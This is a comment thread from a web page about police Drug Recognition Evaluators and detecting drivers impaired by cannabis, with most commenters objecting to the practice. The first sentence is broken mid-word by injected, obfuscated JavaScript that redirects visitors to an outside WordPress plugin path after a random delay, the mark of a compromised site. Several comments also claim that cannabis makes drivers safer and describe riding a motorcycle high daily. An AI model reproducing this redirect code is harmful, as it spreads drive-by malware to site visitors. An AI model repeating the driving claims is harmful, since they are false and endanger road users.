There’s no breathalyzer for marijuana, so catching high drivers is the job of Drug Recognition Evaluatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tors. 100% straight up propaganda.
cannabis doesnt affect your ability to drive. it makes you MORE safe. this is tyranny against peaceful citizens. this doesn't warrant unlawful seizure.
Their main concern should be alcohol and prescription drugs.
Everything else maximizes your ability to drive.
If someone is tripping balls on mushrooms they will not drive that is a guarantee unless it is absolutely necessary which means their life is in danger which ultimately warrants the use of a Vehicle.
If you're in trouble and you see a vehicle as an escape you're not going to ponder the moral implications of what's going to happen when your life is in danger.
Other than that drastic scenario cannabis is a wonderful healing herb.
It is not a drug like pharmaceuticals of which one pinch of fentanyl can kill you
THE GOVERNMENT WILL BECOME DRUG DEALERS JUST TO COLLECT TAXES ; HOW IMMORAL

What a waste of time. "Drug recognition evaluators" is a meaningless title, and just lets cops arrest whoever they want, without the actual data from something like a breathalyser. NL
stillhas a problem with drunk drivers, how about working on fixing that first? Recklessness from alcohol is much more dangerous than sluggishness from pot.Until the cops have something like a breathalyser for this, it's pointless.
The Canadian Drug Policy Coalition released a very informative report on March 27, 2017 that covers a lot of the flaws with these SFST and DRE's – full with referenced studies…
From her comments this example is also covered by that report; to quote it:
…
The smell of marijuana in the car may foster the impression on the part of police that the person might be impaired, which creates the risk of confirmation bias: that is, the officer may be biased to interpret results of the SFST in a manner that fits a pre-existing belief that the person must be impaired.
…
There are many other studies on these flawed measurements, including The American Automobile Association and well, lots of objective science… I have lots of links to these reports and studies.
lol i bet this chick is fun at parties
I ride a motorcycle high everyday and I am the safest on the road. Focus on the real issues like texting or talking on the phone while driving. More people are killed by someone on the phone compared to a drunk driver. Do your jobs pigs!
Smoke weed everyday
It's the opinion of the Officer. What absolute Trash. Ambiguous laws are the death of democracy.
What a joke smh…Ordering a Urinalysis DOES NOT prove that a person is under the influence while driving. A blood test would be more accurate in determining whether someone has smoked in the last 8-12 hours or not. What a Urinalysis will do is pinch people who may have smoked a day or a week or a month or possibly up to 90 days ago depending on your metabolism since these tests are designed to find metabolites not actual THC. The system is rigged folks…Head for the hills!!!
Hi is NOT impaired. See you in court. Do Not Drink and Drive that is impaired. Most non athletic people will not pass this test so just blow .
They do fish for evidence and they sure as hell will make things up! All they have to do is say you went over the center line and even if you didn't they pull you over anyways! Some of these cops are as bad if not worse than those they are trying to bust!
So stupid. When will science and facts catch up with these people? I smoke pot every day, basically all day. It is my default. I'm actually impaired when I don't smoke–start to sweat due to underlying anxiety condition that is mostly controlled by my long-standing anti-anxiety prescription meds, but not completely. Pot helps me. And let's be clear, I'm a functioning career person, a homeowner, father, husband and responsible community member. I have a graduate level education and work a full-time in an academic setting. I have a clean driving record as well, and I'm approaching middle age. This woman could completely derail my life. For absolutely no reason. I don't get high when I smoke weed–I just feel normal. I make sure I have nothing on my person and never smoke in my vehicle. Hopefully law enforcement will eventually have better, more scientific tools, and knowledge at their disposal.
